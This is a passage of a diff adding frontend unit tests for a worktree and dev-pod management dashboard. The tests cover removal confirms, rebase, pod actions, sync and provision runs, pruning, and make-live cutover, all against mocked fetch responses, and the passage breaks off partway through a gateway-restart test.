+    commits: [{ hash: 'abc1234', subject: 'add the thing', when: '2 days ago' }],
+    disk_mb: 512,
+    pod_running: true,
+    pod_port: 7791,
+    own_commits: 1,
+    real_dirty: true,
+  }
+
+  it('renders design docs, commits and the pod-log control from the detail payload', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow({ running: true, health: 200 })), (u) => {
+      if (u.includes('/worktree?name=')) return res(DETAIL)
+      if (u.includes('/pod/logs')) return res({ ok: true, logs: 'pod line one\npod line two' })
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    fireEvent.click(screen.getByLabelText('Expand'))
+
+    await waitFor(() => expect(screen.getByText('docs/rfc-a.md')).toBeInTheDocument(), { timeout: 4000 })
+    expect(screen.getByText('docs/rfc-b.md')).toBeInTheDocument()
+    expect(screen.getByText('abc1234')).toBeInTheDocument()
+    expect(screen.getByText('add the thing')).toBeInTheDocument()
+    expect(screen.getByText('2 days ago')).toBeInTheDocument()
+    expect(screen.getByText(/Disk:\s*512\s*MB/)).toBeInTheDocument()
+
+    // The pod-log control only exists while the pod is running.
+    fireEvent.click(screen.getByText('Load pod logs'))
+    await waitFor(() => expect(screen.getByText(/pod line one/)).toBeInTheDocument())
+    // Second click collapses without refetching.
+    fireEvent.click(screen.getByText('Hide logs'))
+    await waitFor(() => expect(screen.queryByText(/pod line one/)).toBeNull())
+  })
+
+  it('reports a pod-log failure instead of rendering an empty panel', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow({ running: true, health: 200 })), (u) => {
+      if (u.includes('/worktree?name=')) return res(DETAIL)
+      if (u.includes('/pod/logs')) return res({ ok: false, error: 'journalctl unavailable' })
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    fireEvent.click(screen.getByLabelText('Expand'))
+    await waitFor(() => expect(screen.getByText('Load pod logs')).toBeInTheDocument(), { timeout: 4000 })
+    fireEvent.click(screen.getByText('Load pod logs'))
+    await waitFor(() => expect(screen.getByText('journalctl unavailable')).toBeInTheDocument())
+  })
+
+  it('reports a pod-log transport failure', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow({ running: true, health: 200 })), (u) => {
+      if (u.includes('/worktree?name=')) return res(DETAIL)
+      if (u.includes('/pod/logs')) return Promise.reject(new Error('log stream refused'))
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    fireEvent.click(screen.getByLabelText('Expand'))
+    await waitFor(() => expect(screen.getByText('Load pod logs')).toBeInTheDocument(), { timeout: 4000 })
+    fireEvent.click(screen.getByText('Load pod logs'))
+    await waitFor(() => expect(screen.getByText('log stream refused')).toBeInTheDocument())
+  })
+
+  it('surfaces a detail fetch failure on the row instead of an empty panel', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u) => {
+      if (u.includes('/worktree?name=')) return Promise.reject(new Error('detail backend down'))
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    fireEvent.click(screen.getByLabelText('Expand'))
+    await waitFor(() => expect(screen.getByText('detail backend down')).toBeInTheDocument(), { timeout: 4000 })
+  })
+})
+
+describe('DevFleetPage remove worktree', () => {
+  beforeEach(() => { vi.restoreAllMocks() })
+
+  it('removes an empty worktree after the non-destructive confirm copy', async () => {
+    const removeBodies: string[] = []
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u, opts) => {
+      if (u.includes('/worktree/remove')) { removeBodies.push(String(opts?.body)); return res({ ok: true }) }
+      if (u.includes('/worktree?name=')) return res({ branch: 'feat/a', own_commits: 0, real_dirty: false })
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    fireEvent.click(screen.getByLabelText('Expand'))
+    await waitFor(() => expect(screen.getByText('Remove')).toBeInTheDocument(), { timeout: 4000 })
+    fireEvent.click(screen.getByText('Remove'))
+
+    const dialog = await screen.findByRole('dialog')
+    expect(within(dialog).getByText(/Empty worktree/)).toBeInTheDocument()
+    fireEvent.click(within(dialog).getByRole('button', { name: 'Remove' }))
+    await waitFor(() => expect(screen.getByText('Removed wt-a')).toBeInTheDocument())
+    // An empty checkout needs no --force.
+    expect(removeBodies[0]).toContain('"force":false')
+  })
+
+  it('forces removal of unmerged work only behind the Delete anyway confirm, and reports refusal', async () => {
+    const removeBodies: string[] = []
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u, opts) => {
+      if (u.includes('/worktree/remove')) { removeBodies.push(String(opts?.body)); return res({ ok: false, error: 'worktree is locked' }) }
+      if (u.includes('/worktree?name=')) return res({ branch: 'feat/a', own_commits: 4, real_dirty: true })
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    fireEvent.click(screen.getByLabelText('Expand'))
+    await waitFor(() => expect(screen.getByText('Remove')).toBeInTheDocument(), { timeout: 4000 })
+    fireEvent.click(screen.getByText('Remove'))
+
+    const dialog = await screen.findByRole('dialog')
+    expect(within(dialog).getByText(/Has unmerged work/)).toBeInTheDocument()
+    fireEvent.click(within(dialog).getByRole('button', { name: 'Delete anyway' }))
+    await waitFor(() => expect(screen.getByText('worktree is locked')).toBeInTheDocument())
+    expect(removeBodies[0]).toContain('"force":true')
+  })
+
+  it('reports a transport failure on the removal', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u) => {
+      if (u.includes('/worktree/remove')) return Promise.reject(new Error('remove endpoint down'))
+      if (u.includes('/worktree?name=')) return res({ branch: 'feat/a', shipped: true })
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    fireEvent.click(screen.getByLabelText('Expand'))
+    await waitFor(() => expect(screen.getByText('Remove')).toBeInTheDocument(), { timeout: 4000 })
+    fireEvent.click(screen.getByText('Remove'))
+    const dialog = await screen.findByRole('dialog')
+    fireEvent.click(within(dialog).getByRole('button', { name: 'Remove' }))
+    await waitFor(() => expect(screen.getByText('remove endpoint down')).toBeInTheDocument())
+  })
+
+  it('abandons the removal when the confirm is cancelled', async () => {
+    let removeCalls = 0
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u) => {
+      if (u.includes('/worktree/remove')) { removeCalls++; return res({ ok: true }) }
+      if (u.includes('/worktree?name=')) return res({ branch: 'feat/a', shipped: true })
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    fireEvent.click(screen.getByLabelText('Expand'))
+    await waitFor(() => expect(screen.getByText('Remove')).toBeInTheDocument(), { timeout: 4000 })
+    fireEvent.click(screen.getByText('Remove'))
+
+    const dialog = await screen.findByRole('dialog')
+    expect(within(dialog).getByText(/PR merged/)).toBeInTheDocument()
+    fireEvent.click(within(dialog).getByRole('button', { name: 'Cancel' }))
+    await waitFor(() => expect(screen.queryByRole('dialog')).toBeNull())
+    expect(removeCalls).toBe(0)
+  })
+})
+
+describe('DevFleetPage rebase', () => {
+  beforeEach(() => { vi.restoreAllMocks() })
+
+  async function confirmRebase() {
+    const menu = await openRowMenu()
+    fireEvent.click(menu.getByText('Rebase onto main'))
+    const dialog = await screen.findByRole('dialog')
+    fireEvent.click(within(dialog).getByRole('button', { name: 'Rebase' }))
+  }
+
+  it('shows the new HEAD inline on success and clears it when dismissed', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u, opts) => {
+      if (u.includes('/rebase') && isPost(opts)) return res({ ok: true, head: 'deadbeefcafe', ahead: 2, behind: 0 })
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    await confirmRebase()
+    // Toast and inline row marker both carry the short HEAD.
+    await waitFor(() => expect(screen.getAllByText('Rebased (HEAD deadbee)').length).toBeGreaterThan(0))
+    fireEvent.click(screen.getByLabelText('Dismiss'))
+    await waitFor(() => expect(screen.queryByLabelText('Dismiss')).toBeNull())
+  })
+
+  it('reports an aborted rebase distinctly from a hard failure', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u, opts) => {
+      if (u.includes('/rebase') && isPost(opts)) return res({ ok: false, conflict: true })
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    await confirmRebase()
+    await waitFor(() => expect(screen.getByText('Conflicts \u2014 aborted')).toBeInTheDocument())
+    expect(screen.getByText('Rebase conflicts')).toBeInTheDocument()
+    fireEvent.click(screen.getByLabelText('Dismiss'))
+  })
+
+  it('surfaces the server error text for a failed rebase', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u, opts) => {
+      if (u.includes('/rebase') && isPost(opts)) return res({ ok: false, error: 'dirty working tree' })
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    await confirmRebase()
+    await waitFor(() => expect(screen.getAllByText('dirty working tree').length).toBeGreaterThan(0))
+    fireEvent.click(screen.getByLabelText('Dismiss'))
+  })
+
+  it('reports a transport failure without leaving an inline marker behind', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u, opts) => {
+      if (u.includes('/rebase') && isPost(opts)) return Promise.reject(new Error('rebase endpoint down'))
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    await confirmRebase()
+    await waitFor(() => expect(screen.getByText('rebase endpoint down')).toBeInTheDocument())
+    // A throw produces no verdict, so there is nothing to dismiss on the row.
+    expect(screen.queryByLabelText('Dismiss')).toBeNull()
+  })
+
+  it('does not touch the branch when the rebase confirm is cancelled', async () => {
+    let rebaseCalls = 0
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u, opts) => {
+      if (u.includes('/rebase') && isPost(opts)) { rebaseCalls++; return res({ ok: true, head: 'aaaaaaa' }) }
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    const menu = await openRowMenu()
+    fireEvent.click(menu.getByText('Rebase onto main'))
+    const dialog = await screen.findByRole('dialog')
+    fireEvent.click(within(dialog).getByRole('button', { name: 'Cancel' }))
+    await waitFor(() => expect(screen.queryByRole('dialog')).toBeNull())
+    expect(rebaseCalls).toBe(0)
+  })
+})
+
+describe('DevFleetPage pod actions', () => {
+  beforeEach(() => { vi.restoreAllMocks() })
+
+  function stubWindowOpen() {
+    const fake = { opener: {} as unknown, location: { href: '' }, close: vi.fn() }
+    vi.spyOn(window, 'open').mockReturnValue(fake as unknown as Window)
+    return fake
+  }
+
+  it('opens the pod in a severed tab once the URL comes back', async () => {
+    const fake = stubWindowOpen()
+    installFetch(fleetOf(MAIN_ROW, readyRow({ running: true, health: 200 })), (u, opts) => {
+      if (u.includes('/pod/') && isPost(opts)) return res({ ok: true, url: 'https://pod.example.test/?k=1' })
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    fireEvent.click(screen.getByText('Open'))
+    await waitFor(() => expect(fake.location.href).toBe('https://pod.example.test/?k=1'))
+    // The pod runs worktree code under test — it must not keep a handle back.
+    expect(fake.opener).toBeNull()
+  })
+
+  it('closes the blank tab and reports the error when the mint fails', async () => {
+    const fake = stubWindowOpen()
+    installFetch(fleetOf(MAIN_ROW, readyRow({ running: true, health: 200 })), (u, opts) => {
+      if (u.includes('/pod/') && isPost(opts)) return res({ ok: false, error: 'mint refused' })
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    fireEvent.click(screen.getByText('Open'))
+    await waitFor(() => expect(screen.getByText('mint refused')).toBeInTheDocument())
+    expect(fake.close).toHaveBeenCalled()
+  })
+
+  it('spins a pod up from the row menu and confirms it came up', async () => {
+    const posted: string[] = []
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u, opts) => {
+      if (u.includes('/pod/up') && isPost(opts)) { posted.push(u); return res({ ok: true }) }
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    const menu = await openRowMenu()
+    fireEvent.click(menu.getByText('Spin up pod'))
+    await waitFor(() => expect(screen.getByText('Pod up: wt-a')).toBeInTheDocument())
+    expect(posted).toHaveLength(1)
+  })
+
+  it('reports a pod start failure with the server reason', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u, opts) => {
+      if (u.includes('/pod/up') && isPost(opts)) return res({ ok: false, error: 'port 7791 in use' })
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    const menu = await openRowMenu()
+    fireEvent.click(menu.getByText('Spin up pod'))
+    await waitFor(() => expect(screen.getByText('port 7791 in use')).toBeInTheDocument())
+  })
+
+  it('stops a running pod from the row menu', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow({ running: true, health: 200 })), (u, opts) => {
+      if (u.includes('/pod/down') && isPost(opts)) return res({ ok: true })
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    const menu = await openRowMenu()
+    fireEvent.click(menu.getByText('Stop pod'))
+    await waitFor(() => expect(screen.getByText('Stopped wt-a')).toBeInTheDocument())
+  })
+
+  it('restarts a running pod from the row menu', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow({ running: true, health: 200 })), (u, opts) => {
+      if (u.includes('/pod/restart') && isPost(opts)) return res({ ok: true })
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    const menu = await openRowMenu()
+    fireEvent.click(menu.getByText('Restart pod'))
+    await waitFor(() => expect(screen.getByText('Restarted wt-a')).toBeInTheDocument())
+  })
+
+  it('reports a transport failure from a pod action', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow({ running: true, health: 200 })), (u, opts) => {
+      if (u.includes('/pod/down') && isPost(opts)) return Promise.reject(new Error('socket hang up'))
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    const menu = await openRowMenu()
+    fireEvent.click(menu.getByText('Stop pod'))
+    await waitFor(() => expect(screen.getByText('socket hang up')).toBeInTheDocument())
+  })
+
+  it('falls back to a named window when the blank tab is blocked', async () => {
+    // A blocked popup returns null, so there is no handle to point at the pod —
+    // the URL has to be opened on its own, still without an opener.
+    const openSpy = vi.spyOn(window, 'open').mockReturnValue(null)
+    installFetch(fleetOf(MAIN_ROW, readyRow({ running: true, health: 200 })), (u, opts) => {
+      if (u.includes('/pod/') && isPost(opts)) return res({ ok: true, url: 'https://pod.example.test/late' })
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    fireEvent.click(screen.getByText('Open'))
+    await waitFor(() => expect(openSpy).toHaveBeenCalledTimes(2))
+    expect(openSpy).toHaveBeenLastCalledWith('https://pod.example.test/late', '_blank', 'noopener')
+  })
+
+  it('hands the QA run to a fresh chat session with the worktree name in the prompt', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow()))
+    const { store } = renderPage()
+    await waitForRow('wt-a')
+    const menu = await openRowMenu()
+    fireEvent.click(menu.getByText('QA + video'))
+    await waitFor(() => expect(store.getState().chat.pendingInput).toContain("worktree 'wt-a'"))
+    expect(store.getState().chat.pendingInput).toContain('pod-e2e')
+  })
+})
+
+describe('DevFleetPage sync run lifecycle', () => {
+  beforeEach(() => { vi.restoreAllMocks() })
+
+  async function startSync() {
+    const trigger = screen.getByText('Pull+Build').closest('button') as HTMLButtonElement
+    fireEvent.click(trigger)
+    fireEvent.click(await screen.findByRole('button', { name: 'Start' }))
+  }
+
+  it('renders the success stepper and a filtered log when the run finishes clean', async () => {
+    installFetch(fleetOf(MAIN_ROW), (u, opts) => {
+      if (u.includes('/sync') && isPost(opts)) return res({ ok: true, run_id: 'sync-ok' })
+      if (u.includes('/run?id=sync-ok')) {
+        return res({ status: 'done', exit_code: 0, output: ['::step::5::restart', 'build finished'], started: nowSec() - 20 })
+      }
+      return null
+    })
+    renderPage()
+    await waitFor(() => expect(screen.getByText('Pull+Build')).toBeInTheDocument(), { timeout: 4000 })
+    await startSync()
+    await waitFor(
+      () => expect(screen.getByText('restart gateway to apply the new build')).toBeInTheDocument(),
+      { timeout: 8000 },
+    )
+    // The step markers are protocol, not output — the panel must not show them.
+    fireEvent.click(screen.getByLabelText('Toggle log'))
+    const pre = await waitFor(() => document.querySelector('pre') as HTMLPreElement)
+    expect(pre.textContent).toContain('build finished')
+    expect(pre.textContent).not.toContain('::step::')
+    fireEvent.click(screen.getByLabelText('Dismiss sync status'))
+    await waitFor(() => expect(screen.queryByLabelText('Dismiss sync status')).toBeNull())
+  }, 20000)
+
+  it('renders the failure stepper with the last output line when the run exits non-zero', async () => {
+    installFetch(fleetOf(MAIN_ROW), (u, opts) => {
+      if (u.includes('/sync') && isPost(opts)) return res({ ok: true, run_id: 'sync-bad' })
+      if (u.includes('/run?id=sync-bad')) {
+        return res({ status: 'done', exit_code: 2, output: ['npm ci failed'], started: nowSec() - 5 })
+      }
+      return null
+    })
+    renderPage()
+    await waitFor(() => expect(screen.getByText('Pull+Build')).toBeInTheDocument(), { timeout: 4000 })
+    await startSync()
+    await waitFor(() => expect(screen.getByText('Pull+Build failed')).toBeInTheDocument(), { timeout: 8000 })
+    expect(screen.getByText('Pull+Build failed (exit 2): npm ci failed')).toBeInTheDocument()
+    fireEvent.click(screen.getByLabelText('Toggle log'))
+    expect((document.querySelector('pre') as HTMLPreElement).textContent).toContain('npm ci failed')
+    fireEvent.click(screen.getByLabelText('Dismiss sync status'))
+    await waitFor(() => expect(screen.queryByLabelText('Dismiss sync status')).toBeNull())
+  }, 20000)
+
+  it('declares the run lost when the registry 404s mid-poll instead of freezing the bar', async () => {
+    installFetch(fleetOf(MAIN_ROW), (u, opts) => {
+      if (u.includes('/sync') && isPost(opts)) return res({ ok: true, run_id: 'sync-gone' })
+      if (u.includes('/run?id=sync-gone')) return res({ error: 'unknown run' }, 404)
+      return null
+    })
+    renderPage()
+    await waitFor(() => expect(screen.getByText('Pull+Build')).toBeInTheDocument(), { timeout: 4000 })
+    await startSync()
+    await waitFor(
+      () => expect(screen.getByText('Sync run lost (gateway restarted mid-sync). Re-run Pull+Build.')).toBeInTheDocument(),
+      { timeout: 8000 },
+    )
+    expect(screen.getByText(/run lost; check git state/)).toBeInTheDocument()
+  }, 20000)
+
+  it('reports a transport failure on the sync POST without leaving the button stuck', async () => {
+    installFetch(fleetOf(MAIN_ROW), (u, opts) => {
+      if (u.includes('/sync') && isPost(opts)) return Promise.reject(new Error('gateway unreachable'))
+      return null
+    })
+    renderPage()
+    await waitFor(() => expect(screen.getByText('Pull+Build')).toBeInTheDocument(), { timeout: 4000 })
+    await startSync()
+    await waitFor(() => expect(screen.getByText('gateway unreachable')).toBeInTheDocument())
+    expect(screen.getByText('Pull+Build').closest('button')).not.toBeDisabled()
+  })
+
+  it('lets a reattached in-flight run be inspected and dismissed', async () => {
+    installFetch({ ...fleetOf(MAIN_ROW), sync_run_id: 'sync-live' }, (u) => {
+      if (u.includes('/run?id=sync-live')) {
+        return res({ status: 'running', output: ['::step::3::npm ci', 'installing deps'], started: nowSec() - 45, step_label: '3/5 npm ci' })
+      }
+      return null
+    })
+    renderPage()
+    await waitFor(() => expect(screen.getByText('Syncing')).toBeInTheDocument(), { timeout: 6000 })
+    expect(screen.getByText('3/5 npm ci')).toBeInTheDocument()
+    fireEvent.click(screen.getByLabelText('Toggle log'))
+    const pre = await waitFor(() => document.querySelector('pre') as HTMLPreElement)
+    expect(pre.textContent).toContain('installing deps')
+    fireEvent.click(screen.getByLabelText('Dismiss sync status'))
+    await waitFor(() => expect(screen.queryByText('Syncing')).toBeNull())
+  }, 15000)
+})
+
+describe('DevFleetPage provision failures', () => {
+  beforeEach(() => { vi.restoreAllMocks() })
+
+  const unbuilt = readyRow({ name: 'wt-new', has_dist: false, path: '/w/new' })
+
+  it('keeps a visible failed stepper when the run never starts', async () => {
+    installFetch(fleetOf(MAIN_ROW, unbuilt), (u, opts) => {
+      if (u.includes('/pod/provision') && isPost(opts)) return res({ ok: false })
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-new')
+    fireEvent.click(screen.getByText('Provision'))
+    await waitFor(() => expect(screen.getByText('Provision failed')).toBeInTheDocument())
+    // Both the toast and the stepper's last-output line carry the reason.
+    expect(screen.getAllByText('Provision failed to start').length).toBeGreaterThan(0)
+    fireEvent.click(screen.getByLabelText('Dismiss provision status'))
+    await waitFor(() => expect(screen.queryByText('Provision failed')).toBeNull())
+  })
+
+  it('keeps a visible failed stepper when the provision POST cannot be sent', async () => {
+    installFetch(fleetOf(MAIN_ROW, unbuilt), (u, opts) => {
+      if (u.includes('/pod/provision') && isPost(opts)) return Promise.reject(new Error('provision endpoint down'))
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-new')
+    fireEvent.click(screen.getByText('Provision'))
+    await waitFor(() => expect(screen.getByText('Provision failed')).toBeInTheDocument())
+    expect(screen.getAllByText('provision endpoint down').length).toBeGreaterThan(0)
+    fireEvent.click(screen.getByLabelText('Dismiss provision status'))
+  })
+
+  it('rides out unreadable polls and treats a non-running status as terminal', async () => {
+    // Poll 1 throws, poll 2 returns no run at all, poll 3 reports the timeout —
+    // only the third is terminal, and the first two must not end the run.
+    let polls = 0
+    installFetch(fleetOf(MAIN_ROW, unbuilt), (u, opts) => {
+      if (u.includes('/pod/provision') && isPost(opts)) return res({ ok: true, run_id: 'prov-1' })
+      if (u.includes('/run?id=prov-1')) {
+        polls++
+        if (polls === 1) return Promise.reject(new Error('poll blipped'))
+        if (polls === 2) return res(null)
+        return res({ status: 'timeout', output: ['pip install still running'] })
+      }
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-new')
+    fireEvent.click(screen.getByText('Provision'))
+    await waitFor(() => expect(screen.getByText('Provision timed out')).toBeInTheDocument(), { timeout: 14000 })
+    expect(polls).toBeGreaterThanOrEqual(3)
+    // The accumulated output is retained and auto-expanded on failure.
+    expect(screen.getAllByText('pip install still running').length).toBeGreaterThan(0)
+  }, 25000)
+})
+
+describe('DevFleetPage prune failures', () => {
+  beforeEach(() => { vi.restoreAllMocks() })
+
+  const CANDIDATES = { ok: true, candidates: [{ name: 'wt-a', code: 'merged' }], kept: [], scanned: 1 }
+
+  it('reports a refused preview', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u) => {
+      if (u.includes('/prune-candidates')) return res({ ok: false, error: 'git ls-remote failed' })
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    fireEvent.click(screen.getByText('Prune merged'))
+    await waitFor(() => expect(screen.getByText('git ls-remote failed')).toBeInTheDocument())
+    expect(screen.queryByText('Prune worktrees')).toBeNull()
+  })
+
+  it('says so plainly when the scan finds neither candidates nor kept rows', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u) => {
+      if (u.includes('/prune-candidates')) return res({ ok: true, candidates: [], kept: [], scanned: 0 })
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    fireEvent.click(screen.getByText('Prune merged'))
+    await waitFor(() => expect(screen.getByText('Nothing to prune')).toBeInTheDocument())
+    expect(screen.queryByText('Prune worktrees')).toBeNull()
+  })
+
+  it('reports a transport failure on the preview', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u) => {
+      if (u.includes('/prune-candidates')) return Promise.reject(new Error('scan transport failed'))
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    fireEvent.click(screen.getByText('Prune merged'))
+    await waitFor(() => expect(screen.getByText('scan transport failed')).toBeInTheDocument())
+  })
+
+  it('refuses to run with every candidate deselected', async () => {
+    let runCalls = 0
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u) => {
+      if (u.includes('/prune-candidates')) return res(CANDIDATES)
+      if (u.includes('/prune-run')) { runCalls++; return res({ ok: true }) }
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    fireEvent.click(screen.getByText('Prune merged'))
+    await waitFor(() => expect(screen.getByText('Prune worktrees')).toBeInTheDocument())
+    fireEvent.click(screen.getByLabelText('Select wt-a'))
+    fireEvent.click(screen.getByText('Remove selected'))
+    await waitFor(() => expect(screen.getByText('Nothing selected')).toBeInTheDocument())
+    expect(runCalls).toBe(0)
+  })
+
+  it('drops the checklist when the run is rejected, rather than showing every row Pending', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u) => {
+      if (u.includes('/prune-candidates')) return res(CANDIDATES)
+      if (u.includes('/prune-run')) return res({ ok: false, error: 'prune already running' })
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    fireEvent.click(screen.getByText('Prune merged'))
+    await waitFor(() => expect(screen.getByText('Prune worktrees')).toBeInTheDocument())
+    fireEvent.click(screen.getByText('Remove selected'))
+    await waitFor(() => expect(screen.getByText('prune already running')).toBeInTheDocument())
+    expect(screen.queryByText('Pruning worktrees')).toBeNull()
+  })
+
+  it('drops the checklist when the run POST cannot be sent', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u) => {
+      if (u.includes('/prune-candidates')) return res(CANDIDATES)
+      if (u.includes('/prune-run')) return Promise.reject(new Error('prune transport failed'))
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    fireEvent.click(screen.getByText('Prune merged'))
+    await waitFor(() => expect(screen.getByText('Prune worktrees')).toBeInTheDocument())
+    fireEvent.click(screen.getByText('Remove selected'))
+    await waitFor(() => expect(screen.getByText('prune transport failed')).toBeInTheDocument())
+    expect(screen.queryByText('Pruning worktrees')).toBeNull()
+  })
+
+  it('terminates a name the backend never tracked as an explained failure', async () => {
+    // The worktree vanished between preview and execute, so it is absent from
+    // the status payload — it must not sit "Pending" in a finished checklist.
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u) => {
+      if (u.includes('/prune-candidates')) return res(CANDIDATES)
+      if (u.includes('/prune-run')) return res({ ok: true })
+      if (u.includes('/prune-status')) return res({ running: false, done: 1, items: {} })
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    fireEvent.click(screen.getByText('Prune merged'))
+    await waitFor(() => expect(screen.getByText('Prune worktrees')).toBeInTheDocument())
+    fireEvent.click(screen.getByText('Remove selected'))
+    await waitFor(
+      () => expect(screen.getByTestId('prune-item-wt-a')).toHaveAttribute('data-status', 'failed'),
+      { timeout: 8000 },
+    )
+    expect(screen.getByText('not processed (unknown or no longer a worktree)')).toBeInTheDocument()
+    expect(screen.getByText('Prune complete')).toBeInTheDocument()
+  }, 15000)
+
+  it('rides out an unreadable status poll instead of abandoning the run', async () => {
+    let statusPolls = 0
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u) => {
+      if (u.includes('/prune-candidates')) return res(CANDIDATES)
+      if (u.includes('/prune-run')) return res({ ok: true })
+      if (u.includes('/prune-status')) {
+        statusPolls++
+        if (statusPolls === 1) return Promise.reject(new Error('status blipped'))
+        if (statusPolls === 2) return res(null)
+        return res({ running: false, done: 1, items: { 'wt-a': { status: 'done', error: null } } })
+      }
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    fireEvent.click(screen.getByText('Prune merged'))
+    await waitFor(() => expect(screen.getByText('Prune worktrees')).toBeInTheDocument())
+    fireEvent.click(screen.getByText('Remove selected'))
+    await waitFor(
+      () => expect(screen.getByTestId('prune-item-wt-a')).toHaveAttribute('data-status', 'done'),
+      { timeout: 12000 },
+    )
+    expect(statusPolls).toBeGreaterThanOrEqual(3)
+    expect(screen.getByText('Prune complete')).toBeInTheDocument()
+  }, 20000)
+})
+
+describe('DevFleetPage make live', () => {
+  beforeEach(() => { vi.restoreAllMocks() })
+
+  async function confirmMakeLive() {
+    const menu = await openRowMenu()
+    fireEvent.click(menu.getByText('Make live'))
+    const dialog = await screen.findByRole('dialog')
+    fireEvent.click(within(dialog).getByRole('button', { name: /Make live/i }))
+  }
+
+  it('refuses a cutover to a worktree whose path the backend did not report', async () => {
+    let posts = 0
+    installFetch(fleetOf(MAIN_ROW, readyRow({ path: undefined })), (u, opts) => {
+      if (u.includes('/make-live') && isPost(opts)) { posts++; return res({ ok: true }) }
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    const menu = await openRowMenu()
+    fireEvent.click(menu.getByText('Make live'))
+    await waitFor(() => expect(screen.getByText('Cannot resolve worktree path for wt-a')).toBeInTheDocument())
+    // No confirm was even offered, and nothing was staged.
+    expect(screen.queryByRole('dialog')).toBeNull()
+    expect(posts).toBe(0)
+  })
+
+  it('keeps a refused cutover on the page in a persistent banner', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u, opts) => {
+      if (u.includes('/make-live') && isPost(opts)) return res({ ok: false, error: 'worktree is not built — run Provision first' })
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    await confirmMakeLive()
+    const banner = await waitFor(() => screen.getByTestId('gateway-restart-error'))
+    expect(banner).toHaveTextContent('worktree is not built')
+  })
+
+  it('names the failed operation when the cutover POST cannot be sent', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u, opts) => {
+      if (u.includes('/make-live') && isPost(opts)) return Promise.reject(new Error('Failed to fetch'))
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    await confirmMakeLive()
+    const banner = await waitFor(() => screen.getByTestId('gateway-restart-error'))
+    // Bare transport text says nothing on its own — the banner must lead with
+    // what failed.
+    expect(banner).toHaveTextContent('Make live failed: Failed to fetch')
+  })
+
+  it('stages nothing when the cutover confirm is cancelled', async () => {
+    let posts = 0
+    installFetch(fleetOf(MAIN_ROW, readyRow()), (u, opts) => {
+      if (u.includes('/make-live') && isPost(opts)) { posts++; return res({ ok: true }) }
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    const menu = await openRowMenu()
+    fireEvent.click(menu.getByText('Make live'))
+    const dialog = await screen.findByRole('dialog')
+    fireEvent.click(within(dialog).getByRole('button', { name: 'Cancel' }))
+    await waitFor(() => expect(screen.queryByRole('dialog')).toBeNull())
+    expect(posts).toBe(0)
+  })
+})
+
+describe('DevFleetPage gateway restart handshake', () => {
+  const origReload = window.location.reload
+
+  beforeEach(() => { vi.restoreAllMocks() })
+  afterEach(() => {
+    Object.defineProperty(window.location, 'reload', { configurable: true, value: origReload })
+  })
+
+  it('reloads once a gateway answers when no identity was captured', async () => {
+    const reloadSpy = vi.fn()
